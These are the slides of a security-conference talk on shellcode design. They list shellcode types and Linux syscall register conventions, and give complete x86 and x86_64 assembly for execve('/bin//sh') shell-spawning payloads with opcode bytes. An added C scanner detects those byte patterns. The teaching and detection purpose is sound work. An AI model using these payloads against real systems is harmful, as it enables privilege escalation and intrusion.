Design and Implementation of Shellcodes
Amr Ali
Cairo Security Camp 2010

What is a shellcode?
  • It's bytecode
  • Machine language
  • Compiled Assembly source file
  • A string of mostly unprintable characters
  • Opcodes that the processor executes directly
  • Mostly doesn't contain NULL bytes
  • It is position independent

Types of Shellcodes
  • Local shellcode
  • Remote shellcode
  • Download and execute shellcode
  • Egg-hunt shellcode
  • Omelet shellcode

Local shellcode
[Diagram labels: System + Normal User Privs, Shellcode, Vulnerable Root Process, System + Root Privs]

Remote shellcode
[Diagram labels: Network, Shellcode, Vulnerable Remote Service, System + Root Privs]

Download and execute shellcode
[Diagram labels: Any Medium, Shellcode, Vulnerable Anything, Payload on the Internet, System, Downloads, Runs Payload]

Egg-hunt shellcode
[Diagram labels: Vulnerable Process, Egg-hunt Shellcode, Shellcode, Unpredictable location]

Omelet...?

Omelet shellcode
[Diagram labels: Egg-hunt Shellcode, Shellcode Chunk, Vulnerable Process, Shellcode Chunk, Shellcode Chunk, Shellcode Chunk]

x86 and Linux kernel ABI
  • EAX: Holds the system call number.
  • EBX: Contains the value or address of the 1st argument to the system call.
  • ECX: Contains the value or address of the 2nd argument to the system call.
  • EDX: Contains the value or address of the 3rd argument to the system call.
  • EDI: General purpose register.
  • ESI: General purpose register.
  • EBP: Base Pointer register.
  • ESP: Stack Pointer register.
  • EIP: Instruction Pointer register.

x86_64 and Linux kernel ABI
  • RAX: Contains the system call number.
  • RBX: General purpose register.
  • RCX: General purpose register.
  • RDX: The 3rd argument for the system call.
  • RDI: The 1st argument for the system call.
  • RSI: The 2nd argument for the system call.
  • RBP: Base Pointer register.
  • RSP: Stack Pointer register.
  • RIP: Instruction Pointer register.
  • R8: The 4th argument for the system call.
  • R9: The 5th argument for the system call.
  • R10: The 6th argument for the system call.
  • R11 – R15: General purpose registers.
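
x86 shellcode

    .global _start
    _start:
        cltd                    # 0x99                      sign-extend EAX into EDX
        push %edx               # 0x52                      push EDX below the string
        push $0x68732f2f        # 0x68 0x2f 0x2f 0x73 0x68  "//sh"
        push $0x6e69622f        # 0x68 0x2f 0x62 0x69 0x6e  "/bin"
        movl %esp, %ebx         # 0x89 0xe3                 EBX = address of "/bin//sh"
        push %edx               # 0x52
        push %ebx               # 0x53
        push %esp               # 0x54
        pop %edx                # 0x5a                      EDX = address of the two values just pushed
        movb $0x0b, %al         # 0xb0 0x0b                 AL = 11 (execve)
        int $0x80               # 0xcd 0x80                 enter the kernel

x86_64 shellcode

    .global _start
    _start:
        cltd                            # 0x99              sign-extend EAX into EDX
        push %rdx                       # 0x52              push RDX below the string
        movq $0x68732f6e69622f2f, %rbx  # 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68  "//bin/sh"
        push %rbx                       # 0x53
        movq %rsp, %rdi                 # 0x48 0x89 0xe7    RDI = address of "//bin/sh"
        push %rdx                       # 0x52
        push %rdi                       # 0x57
        movq %rsp, %rsi                 # 0x48 0x89 0xe6    RSI = address of the two values just pushed
        push $0x3b                      # 0x6a 0x3b
        pop %rax                        # 0x58              RAX = 59 (execve)
        syscall                         # 0x0f 0x05         enter the kernel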
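
A defender-side view of the two listings above, as an added example that is not part of the original slides: a small C scanner that scores a buffer on the byte patterns annotated in those listings, plus the absence of NULL bytes noted on the "What is a shellcode?" slide. The function names, weights and threshold are assumptions chosen for illustration, and the sample buffers are constructed from the opcode comments on the slides.

```c
#include <stdio.h>
#include <string.h>

/* Patterns copied from the opcode comments in the two listings above. */
struct sig { const char *name; const unsigned char *pat; size_t len; int weight; };
static const unsigned char P_INT80[]    = {0xcd, 0x80};
static const unsigned char P_SYSCALL[]  = {0x0f, 0x05};
static const unsigned char P_PUSH_SH[]  = {0x68, 0x2f, 0x2f, 0x73, 0x68};
static const unsigned char P_PUSH_BIN[] = {0x68, 0x2f, 0x62, 0x69, 0x6e};
static const unsigned char P_MOV_PATH[] = {0x48, 0xbb, 0x2f, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68};
/* Weights are assumptions: two-byte opcodes appear by chance, long patterns rarely do. */
static const struct sig SIGS[] = {
    {"int $0x80",             P_INT80,    sizeof P_INT80,    1},
    {"syscall",               P_SYSCALL,  sizeof P_SYSCALL,  1},
    {"push \"//sh\"",         P_PUSH_SH,  sizeof P_PUSH_SH,  2},
    {"push \"/bin\"",         P_PUSH_BIN, sizeof P_PUSH_BIN, 2},
    {"movq \"//bin/sh\",%rbx", P_MOV_PATH, sizeof P_MOV_PATH, 3},
};
/* Constructed samples: the annotated bytes of each listing in order, and plain text. */
static const unsigned char X86_SAMPLE[] = {0x99,0x52,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,
    0x6e,0x89,0xe3,0x52,0x53,0x54,0x5a,0xb0,0x0b,0xcd,0x80};
static const unsigned char X64_SAMPLE[] = {0x99,0x52,0x48,0xbb,0x2f,0x2f,0x62,0x69,0x6e,0x2f,0x73,
    0x68,0x53,0x48,0x89,0xe7,0x52,0x57,0x48,0x89,0xe6,0x6a,0x3b,0x58,0x0f,0x05};
static const unsigned char TEXT_SAMPLE[] = "PATH=/usr/local/bin:/usr/bin";

/* Return 1 if the m-byte pattern occurs anywhere in the n-byte buffer. */
static int contains(const unsigned char *buf, size_t n, const unsigned char *pat, size_t m) {
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(buf + i, pat, m) == 0) return 1;
    return 0;
}

/* Sum the weights of every pattern present; add 1 if a matching buffer is also NUL-free. */
int shellcode_score(const unsigned char *buf, size_t n) {
    int score = 0;
    for (size_t i = 0; i < sizeof SIGS / sizeof SIGS[0]; i++)
        if (contains(buf, n, SIGS[i].pat, SIGS[i].len)) score += SIGS[i].weight;
    if (score > 0 && memchr(buf, 0, n) == NULL) score += 1;
    return score;
}

/* Threshold of 4 (an assumption) needs more than one weak indicator to fire. */
int is_suspicious(const unsigned char *buf, size_t n) { return shellcode_score(buf, n) >= 4; }

int main(void) {
    printf("x86=%d x86_64=%d text=%d\n", shellcode_score(X86_SAMPLE, sizeof X86_SAMPLE),
           shellcode_score(X64_SAMPLE, sizeof X64_SAMPLE),
           shellcode_score(TEXT_SAMPLE, sizeof TEXT_SAMPLE - 1));
    return 0;
}
```

Exact-byte signatures like these only match the literal encodings shown on the slides, so they serve as a teaching baseline rather than a complete detector.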

Information
  • Smashing the stack for fun and profit, by Aleph1
    http://www.phrack.org/issues.html?issue=49&id=14
  • Shellcode: the assembly cocktail, by Samy Bahra
    http://www.infosecwriters.com/hhworld/shellcode.txt
  • The Shellcoder's Handbook

Thanks
Questions? All presented material today will be available on my website. http://amr-ali.co.cc